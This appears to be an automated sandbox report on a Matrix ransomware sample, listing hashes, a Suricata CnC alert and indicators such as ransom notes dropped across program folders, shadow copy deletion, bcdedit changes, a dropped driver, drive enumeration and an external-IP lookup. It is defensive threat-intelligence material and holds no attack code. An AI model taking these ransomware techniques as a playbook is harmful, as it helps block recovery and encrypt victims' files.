Analysis
-
max time kernel
154s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220112 -
submitted
05/03/2022, 21:05
Static task
static1
Behavioral task
behavioral1
Sample
66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe
Resource
win7-20220223-en
Behavioral task
behavioral2
Sample
66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe
Resource
win10v2004-en-20220112
General
-
Target
66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe
-
Size
2.6MB
-
MD5
bd90a796396be691b806fee34bdcc27b
-
SHA1
8477fdec639e673dfc586e7a37cb2049d0927601
-
SHA256
66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f
-
SHA512
96023528edacfe8afd923839a8e964e72387afa82ceab7f965cb4149375ca1aaff266d0b7213c697e1719786f466a4d27b201534055df0f11734bb632583bccc
Malware Config
Extracted
http://myexternalip.com/raw
Signatures
-
Matrix Ransomware 64 IoCs
Targeted ransomware with information collection and encryption functionality.
description ioc Process File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ko-kr\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files\Google\Chrome\Application\89.0.4389.114\default_apps\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\nb-no\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\fr-fr\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\zh-cn\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\css\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BOLDSTRI\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\pl-pl\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\zh-tw\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\fr-fr\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\fr-fr\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\zh-tw\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-ae\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\pt-br\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ro-ro\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\libs\jquery.ui.touch-punch\0.2.2\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\nb-no\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files\Microsoft Office\root\Office16\ADDINS\Power View Excel Add-in\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ca-es\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\fi-fi\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\cs-cz\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\pl-pl\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ja-jp\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\en-ae\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\AXIS\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\nb-no\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\eu-es\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\en-ae\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\cs-cz\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\PlatformCapabilities\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ca-es\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\fr-ma\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Users\All Users\Oracle\Java\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Users\All Users\Package Cache\{61087a79-ac85-455c-934d-1fa22cc64f36}\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\pl-pl\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\tr-tr\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\cs-cz\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\hu-hu\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\eu-es\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files\VideoLAN\VLC\locale\sq\LC_MESSAGES\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\it-it\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\lib\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ko-kr\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\misc\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ko-kr\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\ja-jp\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fr-ma\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Users\All Users\Microsoft\ClickToRun\ProductReleases\EE65D8FF-D437-4FAB-B3BC-C1431E48AD1A\en-us.16\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\versions\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\sv-se\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\da-dk\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\zh-cn\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files\VideoLAN\VLC\locale\ko\LC_MESSAGES\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe -
suricata: ET MALWARE MSIL/Matrix Ransomware CnC Activity
suricata: ET MALWARE MSIL/Matrix Ransomware CnC Activity
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 1776 bcdedit.exe 208 bcdedit.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 158 1692 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\system32\Drivers\PROCEXP152.SYS dL2ZWDdC64.exe -
Executes dropped EXE 3 IoCs
pid Process 2536 NWvRl3IN.exe 260 dL2ZWDdC.exe 3248 dL2ZWDdC64.exe -
Modifies extensions of user files 1 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File opened for modification C:\Users\Admin\Pictures\MergeSend.tiff 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe -
Sets service image path in registry 2 TTPs
-
resource yara_rule behavioral2/files/0x000600000002213c-150.dat upx behavioral2/files/0x000600000002213c-151.dat upx -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation wscript.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 3796 takeown.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\K: 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened (read-only) \??\I: dL2ZWDdC64.exe File opened (read-only) \??\K: dL2ZWDdC64.exe File opened (read-only) \??\V: dL2ZWDdC64.exe File opened (read-only) \??\W: 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened (read-only) \??\N: 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened (read-only) \??\L: 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened (read-only) \??\G: dL2ZWDdC64.exe File opened (read-only) \??\O: dL2ZWDdC64.exe File opened (read-only) \??\W: dL2ZWDdC64.exe File opened (read-only) \??\V: 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened (read-only) \??\T: 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened (read-only) \??\R: 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened (read-only) \??\E: dL2ZWDdC64.exe File opened (read-only) \??\F: dL2ZWDdC64.exe File opened (read-only) \??\J: dL2ZWDdC64.exe File opened (read-only) \??\Q: 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened (read-only) \??\O: 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened (read-only) \??\J: 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened (read-only) \??\B: dL2ZWDdC64.exe File opened (read-only) \??\N: dL2ZWDdC64.exe File opened (read-only) \??\R: dL2ZWDdC64.exe File opened (read-only) \??\Z: 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened (read-only) \??\M: 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened (read-only) \??\G: 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened (read-only) \??\M: dL2ZWDdC64.exe File opened (read-only) \??\T: dL2ZWDdC64.exe File opened (read-only) \??\X: dL2ZWDdC64.exe File opened (read-only) \??\Y: dL2ZWDdC64.exe File opened (read-only) \??\Z: dL2ZWDdC64.exe File opened (read-only) \??\Y: 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened (read-only) \??\I: 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened (read-only) \??\H: dL2ZWDdC64.exe File opened (read-only) \??\L: dL2ZWDdC64.exe File opened (read-only) \??\P: dL2ZWDdC64.exe File opened (read-only) \??\Q: dL2ZWDdC64.exe File opened (read-only) \??\S: dL2ZWDdC64.exe File opened (read-only) \??\U: dL2ZWDdC64.exe File opened (read-only) \??\U: 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened (read-only) \??\E: 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened (read-only) \??\A: dL2ZWDdC64.exe File opened (read-only) \??\H: 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened (read-only) \??\F: 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened (read-only) \??\X: 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened (read-only) \??\S: 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened (read-only) \??\P: 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 157 myexternalip.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\E1anmCsT.bmp" reg.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derby.jar 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Edit_R_RHP.aapp 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\vlc.mo 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\de-de\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\sv-se\ui-strings.js 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\OFFSYML.TTF 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\nl-nl\ui-strings.js 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\reduced_mode-2x.png 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\pl-pl\ui-strings.js 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\include\win32\jawt_md.h 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\VisualElements\SmallLogoCanary.png 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\caution.svg 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\it-it\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\is.pak 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\mscss7wre_fr.dub 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\home-view\plugin.js 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\tr-tr\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_selectlist_checkmark_18.svg 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ca-es\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\pt-br\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files-select\js\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\resources.jar 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdCO365R_Subscription-pl.xrm-ms 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogoSmall.scale-140.png 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\PMP\DataMatrix.pmp 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Cartridges\sql2000.xsl 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\ECLIPSE_.SF 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata.zh_CN_5.5.0.165303.jar 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\sat_logo_2x.png 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365BusinessR_Subscription-pl.xrm-ms 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\id_get.svg 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\fr-fr\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core.nl_ja_4.4.0.v20140623020002.jar 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.help.nl_zh_4.4.0.v20140623020002.jar 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\Locales\en-US.pak 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN114.XML 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files\Microsoft Office\root\rsod\powerpoint.x-none.msi.16.x-none.tree.dat 